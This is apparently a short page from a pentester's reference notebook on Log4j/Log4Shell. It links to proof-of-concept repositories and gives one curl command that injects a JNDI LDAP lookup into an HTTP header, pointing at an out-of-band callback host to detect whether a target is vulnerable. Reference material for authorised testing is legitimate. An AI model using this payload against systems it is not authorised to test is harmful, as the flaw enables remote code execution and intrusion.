Pentester's Promiscuous Notebook
TwitterGitHubBlogSponsor
Search
⌃K
Links
README
⚒️ Pentest
C2
Infrastructure
Misc
OSINT
Password Brute Force
Perimeter
1C
ADFS
Cisco
DNS
Exchange
Information Gathering
IPSec
Java RMI
Log4j / Log4Shell
Lync & Skype for Business
NTP
Outlook
OWA
SharePoint
SMTP
SSH
Subdomain Takeover
Shells
Web
Wi-Fi
⚔️ Red Team
Basics
Cobalt Strike
Infrastructure
Malware Development
SE
⚙️ Admin
Git
Linux
Networking
Virtualization
Windows
Powered By GitBook

Log4j / Log4Shell

  • ​https://github.com/kozmer/log4j-shell-poc​

Log4jHorizon

  • ​https://www.sprocketsecurity.com/resources/crossing-the-log4j-horizon-a-vulnerability-with-no-return​
  • ​https://github.com/puzzlepeaches/Log4jHorizon​
Check with DNSLog:
$ curl -vvk https://vdi.exmaple.com/portal/info.jsp -H 'Accept-Language: ${jndi:ldap://zcf4r9z7oxec13t7fu1k14n0vr1ip8dx.oastify.com:1337/test}'
Last modified 2mo ago
Copy link